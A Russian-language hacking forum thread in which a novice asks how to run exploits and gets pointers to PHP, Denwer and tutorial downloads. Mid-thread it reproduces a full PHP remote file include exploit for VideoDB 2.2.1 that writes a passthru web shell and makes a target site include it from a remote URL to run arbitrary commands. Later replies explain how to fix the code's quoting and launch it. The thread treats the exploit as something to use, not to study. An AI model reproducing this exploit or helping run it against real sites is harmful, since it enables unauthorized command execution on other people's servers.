Exploit хм пользоватса не умею..

блин один чувак мне показывал как работать с експлотами.Я чота тож захотел но не понял как пользоватся.Сначала он мне сказал скачать perl 5.8.8
я скачал и не дало ни какова ефекта.Что мне делать?и как запустить

 

Здесь описание, как прально ставить и настраивать апач на домашней тачке http://video.antichat.org/file23.html
Может и заработает сплоит, если все грамотно установишь

 

смотри сюда http://forum.antichat.ru/thread26510.html

вот видео как комплить сплоиты

http://zxcvasd.jino-net.ru/video.rar

 

~!DoK_tOR!~ , спасиб



AdvLamer,Я скачал но чота не запускает говорит ошибка

 

2killaye
Ну извини, ты бы как-нить поконкретнее ситуацию обрисовал, а то мало ли ошибка там

 

вот низнаю чувак мне прслал этот експлойт
у меня чота не работает

<?php
/*
::::::::: :::::::::: ::: ::: ::::::::::: :::
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
::::::::::: :::::::::: ::: :::: ::::
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###


+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- VideoDB <= 2.2.1 Remote File Include Exploit
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: VideoDB 2.2.1
- [Script site: http://sourceforge.net/projects/videodb/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Find by: Kacper (a.k.a Rahim)
+
- DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
+
- Contact: [email protected]
- or
- http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
- SkD, nukedclx, Ramzes
-
- Greetz for all users DEVIL TEAM IRC Channel !!
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Z Dedykacja dla osoby,
- bez ktorej nie mogl bym zyc...
- K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mala instrukcja exploita:
w pliku: core/pdf.php znajdziemy kod:
....
define('FPDF', $config['pdf_module']);
define('FPDF_FONTPATH', FPDF.'/font/');

require_once FPDF.'/fpdf.php';
require_once './core/functions.php';
require_once './engines/engines.php';
require_once './core/VariableStream.class.php';
....
jak widaæ jest define, lecz ciagle funkcja FPDF nie jest przypisana,
gratuluje pomyslu autorowy
*/

$cmd = $_POST["cmd"];
$glowna = $_POST["glowna"];
$shell = $_POST["shell"];
$exp= "<title>VideoDB &lt;= 2.2.1 Remote File Include Exploit :: DEVIL TEAM :: The Best Polish Team ::</title>"
."<style type="text/css">"
."body {background-color: #000000;}"
."body,td,th {color: #FFFFFF;}"
."</style><form method="post" action="".$glowna.$shell."?cmd=".$cmd."">"
."<div align="center"><img src="http://www.rahim.webd.pl/index_r2_c3.jpg"></div>"
."<p align="center">script url: (ex. http://www.site.com/[videodb_path]/core/pdf.php?config[pdf_module]=)<br>"
."<input type="text" name="glowna" size="90"".$glowna."">"
."<br>"
."shell url: (ex. http://www.site.com/[path]/shell.txt?) shell.txt (CHMOD 777)<br>"
."<input type="text" name="shell" size="90"".$shell."">"
."<br>"
."cmd: (ex. ls -la)<br>"
."<input name="cmd" type="text" size="90"".$cmd."">"
."<br>"
."<input type="submit" value="Exploit" name="submit">"
."</p>"
."<p align="center">Find by: <a href="mailto:[email protected]">Kacper</a> (a.k.a <a href="mailto:[email protected]">Rahim</a>)<br>"
."<br>"
."DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam<br>"
."<br>"
."Contact: <a href="mailto:[email protected]">[email protected]</a><br>"
."or</p>"
."<p align="center"> <a href="http://www.rahim.webd.pl/">http://www.rahim.webd.pl/</a></p>"
."<p align="center" class="name">&nbsp;</p>"
."<HR WIDTH="650" ALIGN="center">"
."<p align="center"> Z Dedykacja dla osoby,<br>"
."bez ktorej nie mogl bym zyc...<br>"
."K.C:* J.M (a.k.a Magaja)</p>"
."<p align="center">&nbsp;</p>"
."<p align="center"> Special Greetz: DragonHeart ;-)<br>"
."Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi<br>"
."SkD, nukedclx, Ramzes<br>"
."<br>"
."Greetz for all users DEVIL TEAM IRC Channel !!<br>"
."!@ Przyjazni nie da sie zamienic na marne korzysci @!</p>"
."<HR WIDTH="650" ALIGN="center">"
."<p align="center">&nbsp;</p>"
."</form>";

if (!isset($_POST['submit']))
{
echo $exp;
}else{
$file = fopen ("shell.txt", "w+");
fwrite($file, '<?php ob_clean();echo"Hacker_Kacper_Made_in_Poland";ini_set("max_execution_time",0);passthru($_GET["cmd"]);die;?>');
fclose($file);
$file = fopen ($shell, "r");
if (!$file) {
echo "<p>Don't Find shell Insert in FTP shell.txt.n";
exit;
}
echo $exp;
while (!feof ($file)) {
$line .= fgets ($file, 1024)."<br>";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
}
?>

 

Там все кавычки внутри строк, которые конкатенируются, должны быть экранированы \" или заменены на '

 

блин не могу запустить чота всё равно не получаетса добавь в мсн [email protected]
если можеш не доганяю..

 

Какй нафиг перл?? Это ж плюха)
1. качай php
2. пуск - выполнить - cmd
3. в консоли пишешь - путь до php, путь до сплоеда. c:\php\php.exe c:\sploed
4. всё

 

а может стоит perl поучить))?? как думаешь??
хлтяб начало почитай...

 

php у меня чота не качаетса с этаво форума не наю ком лагает ><
XD
php а где скачать то

 

Скачать:
http://www.php.net/downloads.php
ТАНА,
Ты мне?

 

killaye, конечно!!
я просто ща на диалупе, пока загружу все страницы забываю, что хотел)))
вот и получилось так, что сообщение после твоего отправилось))

 

Lol у меня чота не чево не работает ><

 

Качай, всё работает. Автор: Дрочег
http://nepks.narod.ru/xek.rar

 

(с) tclover
вспомнилось =))

что именно не работает??
и если вообще ничего не получается попробуй денвер поставить))
там те и пхп и пёрл, и апач

но возможно как я и написал проблема не в пхп/перл, а знаниях!!

 

чо такое Денвер и где ево скачать

 

+-------------------------------------------------------------------------+
| Джентльменский набор Web-разработчика |
| Версия: Денвер-2 2005-10-07 |
+-------------------------------------------------------------------------+
| Copyright (C) 2001-2004 Дмитрий Котеров. |
+-------------------------------------------------------------------------+
| Данный файл является частью комплекса программ "Денвер-2". Вы не можете |
| использовать его в коммерческих целях. Никакие другие ограничения не |
| накладываются. Если вы хотите внести изменения в исходный код, авторы |
| будут рады получить от вас комментарии и замечания. Приятной работы! |
+-------------------------------------------------------------------------+
| Домашняя страница: http://denwer.ru |
| Контакты: http://forum.dklab.ru/denwer |
+-------------------------------------------------------------------------+

===========================================================================
ВНИМАНИЕ!
Данный пакет, помимо основных компонентов, содержит:
- Parser 3 (полный дистрибутив);
- библиотеки поддержки XML и MySQL для Parser.
===========================================================================

 

И вообще перевербовывать тебя буду...))))
а нука пройдись по этим ссылкам:
http://forum.antichat.ru/forum94.html
http://www.cracklab.ru/
http://www.tuts4you.com/

 

Человек еще сплойтами пользоваться не умеет, а ты его уже на реверсинг тянеш Не рановато ли? Имхо проще какой-нить перл изучить, потом си, потом уже к ассемблеру тянутся... хатя, у меня, какраз, все было в обратном порядке, тож веть резонно, но не в нынешние времена перенасыщение информацией :/